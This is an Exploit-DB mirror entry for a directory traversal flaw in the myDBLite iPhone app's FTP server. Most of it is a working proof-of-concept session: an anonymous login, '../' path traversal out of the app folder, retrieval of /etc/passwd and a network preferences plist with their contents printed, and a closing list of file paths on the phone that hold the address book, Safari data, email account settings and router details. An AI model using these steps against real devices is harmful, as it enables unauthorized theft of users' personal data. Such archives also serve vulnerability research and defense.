bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ios/remote/16229.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

121 lines
No EOL
5.1 KiB
Text
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8
# Version: 1.1.10
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the myDBLite.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 29161
Connected to 192.168.0.70.
220 DiddyDJ FTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User logged in.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfig.plist
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfigInit.plist
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appData.plist
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appDataInit.plist
-rw-r--r-- 1 mobile mobile 9859 1??09 10:55 astonmartin.jpg
-rw-r--r-- 1 mobile mobile 20 1??09 10:55 astonmartin.txt
-rw-r--r-- 1 mobile mobile 11128 1??09 10:55 ferrari.jpg
-rw-r--r-- 1 mobile mobile 74 1??09 10:55 ferrari.txt
-rw-r--r-- 1 mobile mobile 32797 1??09 10:55 frey.jpg
-rw-r--r-- 1 mobile mobile 17553 1??09 10:55 porsche.jpg
-rw-r--r-- 1 mobile mobile 111 1??09 10:55 porsche.txt
-rw-r--r-- 1 mobile mobile 422 2??24 15:20 pswd.bkup
-rw-r--r-- 1 mobile mobile 422 2??24 15:21 pswd.plist
-rw-r--r-- 1 mobile mobile 54378 1??09 10:55 schinznach.jpg
drwxr-xr-x 12 mobile mobile 476 1??04 14:43 secret
226 Transfer complete.
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.
ftp> cd ../../../../../../
250 CWD command successful.
ftp> dir
200: PORT command successful.
150: Opening ASCII mode data connection for '/bin/ls'.
-rwxr-xr-x 40 root admin 30 10??26 01:20 Applications
drwxrwxr-x 1 root admin 68 8??19 04:10 Developer
drwxrwxr-x 24 root admin 884 1??12 12:53 Library
drwxr-xr-x 1 root wheel 102 8??19 04:18 System
-rwxr-xr-x 7 root admin 11 2??23 19:41 User
drwxr-xr-x 59 root wheel 2074 1??13 09:52 bin
drwxr-xr-x 1 root admin 68 10??26 01:19 boot
-rw-r--r-- 1 (null) (null) 638 1??25 15:30 control
drwxrwxr-x 1 root admin 68 8??03 12:41 cores
---------- 1 (null) (null) 0 (null) dev
-rwxr-xr-x 25 root admin 11 8??26 05:20 etc
drwxr-xr-x 1 root admin 68 10??26 01:19 lib
drwxr-xr-x 1 root admin 68 10??26 01:19 mnt
drwxr-xr-x 2 root wheel 136 10??23 15:12 private
drwxr-xr-x 47 root wheel 1666 1??13 09:52 sbin
-rwxr-xr-x 5 root admin 15 8??26 05:20 tmp
drwxr-xr-x 9 root wheel 374 1??13 09:52 usr
-rwxr-xr-x 26 root admin 11 8??26 05:20 var
226 Transfer complete.
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.
ftp> get ../../../../../etc/passwd
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200: PORT command successful.
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
221- Data traffic for this session was 0 bytes in 0 files
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
# IPhone inside information
1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari Favorites List
- /private/var/mobile/Library/Safari
3. Users E-mail Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist
Reference in a new issue View git blame Copy permalink